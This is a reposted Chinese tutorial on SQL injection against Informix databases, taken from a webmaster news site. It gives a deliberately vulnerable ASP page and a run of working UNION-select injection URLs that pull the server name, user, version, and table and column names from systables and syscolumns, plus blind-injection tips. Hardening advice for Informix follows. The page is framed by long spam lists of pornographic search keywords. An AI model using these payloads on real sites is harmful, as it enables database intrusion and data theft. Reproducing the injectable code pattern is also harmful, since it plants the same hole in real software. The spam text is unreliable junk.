亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

Informix注入整理

2022-9-24 10:19| 查看: 3400 |來源: 互聯網

前些時間做一個滲透測試,數據庫是informix的。整理了一下。 informix數據類型比較復雜,在union查詢中最郁悶的就是匹配字段的問題 數據類型如下 inform ...

前些時間做一個滲透測試,數據庫是informix的。整理了一下。

informix數據類型比較復雜,在union查詢中最郁悶的就是匹配字段的問題
數據類型如下
informix的字段類型  
char(size)  
varchar(size)
serial
nchar(size)  
nvarchar(size)
real
interval
date
datetime
integer
smallint
float
smallfloat
money(p,s)
decimal(p,s)
text  
byte  
如果字段數量和類型都匹配了 那么得到數據很容易
****************************************************
測試環境:  
reate table test(name char(32),id int)
****************************************************
ASP代碼
====================================================
<%
Set conn=Server.CreateObject("ADODB.CONNECTION")
Set rs=Server.CreateObject("ADODB.RecordSet")
conn.open "dsn=poison;uid=informix;pwd=xxxxxx"
id=request("id")
strSQL = "select name from test where id=" & id
set rs=conn.execute(strSQL)
response.write(rs("name"))
rs.close
conn.close
%>
=====================================================
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select dbservername from systables;  
dbservername,返回數據庫服務器的名稱
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select user from systables;
user,返回執行查詢的用戶的用戶名(登陸帳戶名)
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(today) from systables;
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’sqlca.sqlerrd1’)) from systables;
返回任何表中插入的最后一個SERIAL值
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(dbinfo(’version’, ’full’)) from systables;
***************************************************************************************************************************

得到任何數據
兩個重要的系統表  
systables:描述數據庫中的很張表;  
syscolumns:描述數據庫中表的列;  
==============================================
select * from systables
tabname syscolumns
owner informix
partnum 1048580
tabid 2
rowsize 157
ncols 10
nindexes 2
nrows 2353.000000000
created 04/28/2008
version 65539
tabtype T
locklevel R
npused 25.00000000000
fextsize 32
nextsize 32
flags 0
site
dbname
type_xid 0
am_id 0
pagesize 4096
ustlowts 2008-04-28 22:26:00.00000
secpolicyid 0
protgranularity
==================================================
select * from syscolumns
colname tabname
tabid 1
colno 1
coltype 13
collength 128
colmin 541543519
colmax 1937339256
extended_id 0
seclabelid 0
colattr 0
===================================================
這樣就可以得到任何表任何列的信息了  
http://127.0.0.1/aaa.asp?id=1 and 1=1 union select to_char(count(*)) from systables
因為informix中利用first n 經常會出現"Cannot use "first", "limit" or "skip" in this context"的問題
(我也不知道什么原因 一些工具也就無法遞歸猜解數據)
systables 中tabid順序排列 可以窮舉得到所有表名  
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select tabname from systables where tabid=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select tabname from systables where tabid=n
得到tabid和tabname的對應關系  
and 1=2 union select colname from syscolumns where tabid=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=1
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=2
http://127.0.0.1/aaa.asp?id=1 and 1=2 union select colname from syscolumns where tabid=100 and colno=n
得到tabid=100 對應表的所有列
表列都有了 直接暴數據
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
不能union只能以為以為去猜 和ACCESS沒什么太大的區別
注意只是一些函數的差別
length長度
substr 返回字符串中的某一部分,例substr(col,1,2)
substring 返回字符串中的某一部分,例substring(col,from 1 to 4)
我沒有找到ASCII轉化的函數
可以用字符表示 例’a’=substr(admin,1,1)
或者用十六進制函數
hex返回表達式的十六進制數

保護informix  
為服務器持續打補丁
每當IBM發布新補丁的時候,應該盡可能地測試這些補丁并將其部署到生產系統上去
加密網絡通信量
應該加密服務器和客戶機之間的通信量。這有助于保護用戶賬戶以及阻止通過網絡竊取數據。通過使用Communication Support Module(通信支持模塊)可以實現這一點。請參看Informix Server Administrator’s Guide(Informix服務器管理員指南)

取消Public的Connect特權
默認地,public被授予了connect特權。這意味著任何人,只要持有有效的操作系統用戶ID和口令,都可以連接到數據庫服務器。

啟用審計
應該對關鍵事件進行審計,例如登陸嘗試失敗。更多細節請參看Administrators Guid或者Trusted Facility Guide。

取消Public對文件訪問例程的權限
默認地,public可以執行文件訪問函數,例如lotofile、filetoclob 和ifx_file_to_file。這將允許攻擊者讀、寫服務器上的文件。為幫助解決這一安全漏洞,創建一個名為FileAccess的角色,按照嚴格的業務需求,只把那些需要訪問文件的用戶分配為該角色的成員。然后為該角色分配對文件訪問例程的執行權限,并取消public的執行權限。
取消Public對模塊例程的執行權限
默認地,public可以執行模塊函數,例如ifx_replace_module、ifx_load_internal和reload_module。這將允許攻擊者強制Informix服務器加載任意的庫并像Informix用戶一樣執行代碼。為幫助解決這一安全漏洞,創建一個名為 ModuleAccess的角色,按照嚴格的業務需求,只把那些需要加載模塊的用戶分配為該角色的成員。然后為該角色分配對這些例程的執行權限,并取消 public的執行權限。
阻止轉儲共享內存
在服務器崩潰事件中,可以將Informix配置為將共享內存段轉儲到磁盤。這是默認配置。因為這些轉儲文件是完全可讀的且包含用戶名和口令,將Informix配置為不轉儲共享內存將更合適。為此,編輯onconfig文件并將 DUMPSHMEM參數設置為0。然后停止并重啟服務器。
阻止對基于Unix的服務器的本地攻擊
Informix遭受的基于Unix平臺的大部分本地安全問題都源自setuid root程序和setgid Informix程序。為了列舉所有這樣的程序,轉到$INFORMIXDIR/bin目錄下并發出下面的命令:
find ./ -perm  4000
這將列舉bin目錄內的全部setuid程序。防止本地用戶攻擊setuid程序的最簡單的辦法是刪除other的執行權限;實際上,可以簡單地刪除others的全部權限:
chmod * o-rwx

限制語言Usage權限
應該限制被授予了C和Java例程語言usage權限的用戶的數量。擁有這些語言的usage權限的任何人都可以像Informix用戶一樣運行代碼。

有用文檔
下述文檔值得一讀:
IBM Informix Dynamic Server Administrator’s Guide:http://publibfp.boulder.ibm.com/epubs/pdf/ct1ucna.pdf
IBM Informix Trusted Facility Guide:http://publibfp.boulder.ibm.com/epubs/pdf/ct1tbna.pdf
IBM Informix Guide to SQL:http://publibfi.boulder.ibm.com/epubs/pdf/ct1sqna.pdf

本文最后更新于 2022-9-24 10:19,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        久久91精品久久久久久秒播| 成人网男人的天堂| 色综合久久中文字幕综合网| 国产欧美一二三区| 国产成人超碰人人澡人人澡| 久久综合99re88久久爱| 国产毛片精品视频| 国产欧美精品区一区二区三区| 国产精品白丝jk白祙喷水网站| 欧美精品一区二区久久久| 国产中文一区二区三区| 久久久久国产免费免费| 成人综合婷婷国产精品久久免费| 精品成人一区二区| 成人理论电影网| 亚洲精品国产成人久久av盗摄| 91麻豆国产福利在线观看| 亚洲一线二线三线视频| 日韩一级免费一区| 国产精品一区2区| 亚洲人成7777| 91精品国产欧美一区二区 | 日韩国产精品91| 久久久亚洲精品石原莉奈| 成人在线视频一区| 亚洲成a人片在线观看中文| 日韩欧美亚洲国产另类| 不卡av免费在线观看| 亚洲sss视频在线视频| 久久久精品免费观看| 欧美伊人久久久久久午夜久久久久| 奇米777欧美一区二区| 中文字幕亚洲成人| 欧美大黄免费观看| 欧美三级日韩三级| youjizz久久| 美女性感视频久久| 亚洲久本草在线中文字幕| 26uuu成人网一区二区三区| 色av综合在线| 成人高清视频在线| 精品制服美女丁香| 日韩国产一区二| 一区二区欧美精品| 国产精品成人网| 国产欧美中文在线| 26uuu国产在线精品一区二区| 欧美伦理电影网| av电影天堂一区二区在线| 久久99精品久久久久久动态图| 亚洲一区在线观看免费观看电影高清| 国产午夜精品福利| 久久影视一区二区| 日韩欧美亚洲国产精品字幕久久久| 91麻豆免费在线观看| 国产成人综合视频| 国产一区二三区| 北条麻妃国产九九精品视频| 国内外成人在线| 国产亚洲综合在线| 国产精品久久久久久久裸模| 国产亚洲女人久久久久毛片| 久久精品一区二区三区不卡牛牛| 日韩三级视频在线观看| 日韩精品中文字幕一区二区三区| 日韩一区二区三区视频在线| 亚洲国产裸拍裸体视频在线观看乱了 | 色综合天天做天天爱| 成人中文字幕合集| 成人高清视频免费观看| 99re热视频精品| 在线观看日韩av先锋影音电影院| 色成人在线视频| 欧美日韩免费高清一区色橹橹| 欧美日韩中文字幕一区二区| 欧美精品三级在线观看| 精品日韩一区二区| 国产精品欧美经典| 亚洲综合久久av| 青青青伊人色综合久久| 国产激情精品久久久第一区二区| 成人激情小说网站| 在线观看av一区二区| 91精品国产91久久综合桃花 | 国产成人精品影视| 一本大道久久a久久精品综合| 欧美天天综合网| 欧美变态tickling挠脚心| 国产视频一区二区在线观看| 亚洲天堂av一区| 久久超碰97中文字幕| 成人国产免费视频| 337p亚洲精品色噜噜噜| 中文字幕免费在线观看视频一区| 一区二区三区自拍| 精品系列免费在线观看| 91蜜桃网址入口| 精品国产一区二区在线观看| 亚洲精品视频在线看| 黄色小说综合网站| 91电影在线观看| 欧美精品一二三四| 久久久精品综合| 国产精品久久99| 日本一区二区电影| 91美女视频网站| 亚洲一区二区三区中文字幕在线| 午夜精品久久久久久久99樱桃| 蜜臀a∨国产成人精品| 99久久综合色| 2021久久国产精品不只是精品| 日韩一区二区在线观看| 91麻豆精品国产91久久久使用方法| 欧美日韩日日骚| 精品毛片乱码1区2区3区| 色综合天天综合给合国产| 亚洲免费色视频| 国产高清不卡一区| 欧美成人精品二区三区99精品| 一区二区三区日本| 99麻豆久久久国产精品免费优播| 久久婷婷综合激情| 精品一区二区三区在线观看 | 国产欧美一区二区精品仙草咪| 日韩av中文字幕一区二区三区| 色狠狠一区二区| 一区二区三区自拍| 色成人在线视频| 亚洲观看高清完整版在线观看| 色综合一区二区三区| 亚洲自拍偷拍综合| 欧美性xxxxxx少妇| 一区2区3区在线看| 91亚洲资源网| 一区二区在线观看不卡| 色噜噜夜夜夜综合网| 亚洲人成精品久久久久| 91国内精品野花午夜精品| 亚洲一区二区三区影院| 欧美日韩精品一区二区在线播放| 偷拍一区二区三区四区| 91精品国产色综合久久久蜜香臀| 免费成人av在线| 久久久久亚洲综合| 99综合影院在线| ㊣最新国产の精品bt伙计久久| 91黄色在线观看| 五月天一区二区| www国产精品av| 99久久精品一区| 天天av天天翘天天综合网 | 亚洲成人777| 99精品国产99久久久久久白柏 | 国产精品天干天干在观线| 色综合天天性综合| 韩国欧美国产1区| 亚洲成人激情av| 亚洲国产wwwccc36天堂| 亚洲精品综合在线| 久久久精品综合| 精品久久久久久久一区二区蜜臀| 国产麻豆成人传媒免费观看| 亚洲精品成人精品456| 欧美午夜精品久久久久久超碰| 欧美在线观看视频一区二区| 一区2区3区在线看| 久久亚洲精精品中文字幕早川悠里| av网站免费线看精品| 午夜av一区二区| 亚洲四区在线观看| 精品日韩一区二区三区免费视频| 色综合久久综合网欧美综合网 | 欧美一区二区人人喊爽| 成人av高清在线| 另类欧美日韩国产在线| 亚洲精品少妇30p| 国产亚洲欧美一区在线观看| 欧美性猛交xxxx乱大交退制版| 国产不卡免费视频| 免费av成人在线| 亚洲黄色av一区| 国产精品免费人成网站| 精品日韩在线观看| 欧美精品三级日韩久久| 色综合久久天天| 99视频有精品| 成人免费观看视频| 国产一区二区三区最好精华液| 五月婷婷综合激情| 天涯成人国产亚洲精品一区av| 亚洲人成伊人成综合网小说| 久久九九久精品国产免费直播| 51精品久久久久久久蜜臀| 色诱亚洲精品久久久久久| 成人黄色综合网站| 成人伦理片在线| 成人动漫一区二区在线| 国产成人久久精品77777最新版本| 国产一区二区三区精品欧美日韩一区二区三区 | 91精品国产入口|